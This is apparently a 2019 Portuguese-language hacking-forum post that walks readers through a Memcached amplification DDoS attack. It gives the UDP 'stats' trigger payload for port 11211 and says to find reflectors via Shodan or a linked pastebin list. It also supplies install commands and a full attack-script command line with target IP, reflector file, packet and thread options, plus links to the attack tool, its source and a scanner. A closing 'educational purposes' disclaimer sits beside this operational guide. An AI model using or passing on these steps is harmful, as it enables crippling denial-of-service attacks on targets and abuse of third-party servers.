WWW.FLEPS.COM.BR

Memcached DDoS

By admin at 2019-04-26 • 0 colecionador • 823 visualizações de página

Vou falar um pouco sobre essa vulnerabilidade e mostrar como usá-la. 
Para isso, precisamos do nosso Linux favorito. Eu uso Kali, mas em geral não importa. 

Um pouco de fundo:

Recentemente descobri uma nova vulnerabilidade, que permite aumentar o ataque. Para fazer um ataque, basta saber os endereços IP dos servidores vulneráveis com a porta aberta 11211. Existem cerca de 17 mil desses endereços.Um pacote é enviado para a porta do servidor vulnerável:
Código:

\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

Depois de processar o pacote, o servidor responde com um pacote grande de até 1 mb. Isso permitiu um ataque de 1,3 TB / s. O Github também não lidou com o ataque, o provedor estrangeiro, e para lançar um ataque desse tipo, leva apenas alguns minutos. 

Nuss vai começar ...

Primeiro precisamos encontrar o servidor, para isso vamos usar o Shodan .


Ou use a lista já preparada, que foi coletada para nós - https://pastebin.com/raw/eSCHTTVu . O script de ataque é escrito em python 2.7.
Código:

sudo apt-get install python

Então nós instalamos as bibliotecas necessárias ...

Código:

python -m pip install datetime python -m pip install scapy

Execute o programa ...

Código:

python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100 T - Цель S - Файл с уязвимыми серверами P - Кол-во отправленных пакетов Thread - Потоки

Link para o programa - https://github.com/DefWolf/Memecrashed

Assim como a origem do ataque: https://pastebin.com/nmthYmHu

Scanner útil para pesquisa: https://pastebin.com/GZcekqLz


FINS EDUCATIVOS!


OBS: Programas de execução de terceiros são de extrema responsabilidade de que o usa e executa!

Nosso fórum não se responsabiliza pelos seus atos!

Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: